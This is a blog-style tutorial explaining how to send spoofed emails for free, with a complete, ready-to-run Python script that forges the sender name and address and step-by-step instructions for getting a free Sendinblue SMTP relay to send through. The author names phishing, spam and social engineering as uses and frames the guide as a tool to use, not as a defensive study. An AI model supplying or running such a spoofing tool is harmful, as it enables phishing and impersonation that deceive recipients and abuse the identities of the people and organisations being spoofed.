How to Spoof Email for FREE? — Guide

Method of Spoofing Emails using 💯 Free Resources

XIT
6 min readMar 7, 2023

Follow XIT on medium & UglyCompany on Telegram for more..

Proof Of Concept 😂

It’s been a long and a lot of people have been asking for a guide to sending spoofing email, so I thought to write on it today. As you read in the title, the Email Spoofing for Free!? Yes :) the resources I’m using in this process are totally free of cost and nothing will be charged. There are even other email spoofing methods which is more advanced than this, but it includes the paid resources which I can’t afford 😂 as I see no incoming tips from ya’ll. So lets start on todays topic; Have you ever received an email in your box that looked as if it came from a different sender than it actually did? This is called email spoofing, and it can be done for a variety of reasons. In this guide, we’ll explore the basics of email spoofing and show you how to do it using free resources.

What is Email Spoofing?

Email spoofing includes sending emails with addresses that appear to be from someone else which we don’t have access in real. This is mainly done by changing the header information of the email sender to make it look like it came from a different legit sender. Email spoofing can be used for a variety of reasons, like phishing attacks, spam, and social engineering.

Why is Email Spoofing Done?

Email spoofing can be done for both malicious and non-malicious purposes. Example: a company might use email spoofing to send emails from a generic email address (“admin@xitcompany.com”) instead of an employee’s personal email address. On the other hand, spammers and scammers may use email spoofing to trick recipients into clicking on links or opening attachments that contain malware.

Requirements for Email Spoofing

Below are the Requirements for Email Spoofing (All the resources are free of cost so no need to invest anything for those)

  1. Spoof Email Sending Script
  2. Free SMTP (I’m using sendinblue.com in this tuto. which can send 300 emails for free. No credit card & No documents required for account verification)

What is SMTP?

SMTP is the short for Simple Mail Transfer Protocol. It’s the standard protocol used for sending and receiving emails over the internet.

1) Spoof Email Sending Script

Using below script you can send the basic text message to the target email address using the spoofed email with the spoof name. Make sure you do the following changes in the script.py file & config.ini file.

changes to make in the script.py
changes to make in the config.ini (if you are using some other SMTP then make sure you also edit the host & port values)

script.py source:

### script.py ###
# SHHH! XIT WAS HERE
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
import traceback
import configparser

config = configparser.ConfigParser()
config.read('config.ini')

def send_mail(receiver_email, spoofed_email, spoofed_name, message, subject):
try:
msg = MIMEMultipart("related")
msg['From'] = f"{spoofed_name} <{spoofed_email}>"
msg['To'] = receiver_email
msg['Subject'] = subject
body = message
msg.attach(MIMEText(body, 'plain'))
# Get SMTP settings from config file
smtp_host = config.get('SMTP', 'host')
smtp_port = config.getint('SMTP', 'port')
smtp_username = config.get('SMTP', 'username')
smtp_password = config.get('SMTP', 'password')
# Connect to SMTP server and send email
server = smtplib.SMTP(smtp_host, smtp_port)
server.starttls()
server.login(smtp_username, smtp_password)
text = msg.as_string()
server.sendmail(spoofed_email, receiver_email, text)
server.quit()
print('Spoofed Email sent successfully to '+ str(receiver_email) + ' from ' + str(spoofed_name))
except Exception as e:
# Print the exception
print(traceback.format_exc())

receiver_email = '<Receivers Email Address>'
spoofed_email = '<Spoofed Email Address>'
spoofed_name = '<Spoofed Name>'
message = '<Text Message to send>'
subject = '<Email Subject/Title>'

# Invoke send_mail to send email
send_mail(receiver_email,spoofed_email,spoofed_name, message, subject)

The above script creates a multipart MIMEM message with From, To and Subject headers and adds a MIMET body. Next, connect to the SMTP server specified in the configuration file, enable TLS encryption, and log in with the specified username and password. Finally, it sends the email using the sendmail() method of the SMTP server object. To use this script, you would need to modify the following variables:

  1. receiver_email: The email address of the recipient.
  2. spoofed_email: The email address you want to spoof (i.e., the email address that will appear in the From header of the email).
  3. spoofed_name: The name you want to associate with the spoofed email address.
  4. message: The text of the email message.
  5. subject: The subject line of the email message.

You would also need to create a config.ini file with the following SMTP settings:

[SMTP]
host = <SMTP server hostname>
port = <SMTP server port>
username = <SMTP server username>
password = <SMTP server password>

2) Getting SMTP for Free

There are several SMTP providers who has free plans included, most of them don’t even ask for verification while registration, so you can make use of them. Here, i’ll be using sendinblue.com to get SMTP for free of cost & even they didn’t asked for Credit Card while registration. Below are the step by step guide to get it:

🤣 Ignore the inputs & put your real info in it..

Step-1: Create your account

Visit https://onboarding.sendinblue.com/account/register & signup using your email.

Step-2: Verify Your Email

Check your inbox for an email from Sendinblue and click on the verification link.

Step-3: Set Up Your Account

Fill the basic info to set up your account.

Step-4: Get Your SMTP Information

Click on the “SMTP & API” tab in your project dashboard to access your SMTP information.

Step-5: Configure Your Email Script

Use the SMTP information provided by Sendinblue to configure your email sending script.py & config.ini file.

Once you are done with these all steps then you are good to use the script for sending spoof emails. If you encounter any errors or issues then kindly drop a comment below. Also if you like the content and want more, then drop a tip. & make sure you Follow so you will be notified once we upload some cool stuff like such.

That’s all for today, lets meet in the next topic. Stay secure, Stay Safe.

A supporter is worth a thousand followers. 😊

--

--

XIT
XIT

Written by XIT

SHHH! The voice of none is stronger than the voice of one.

Responses (11)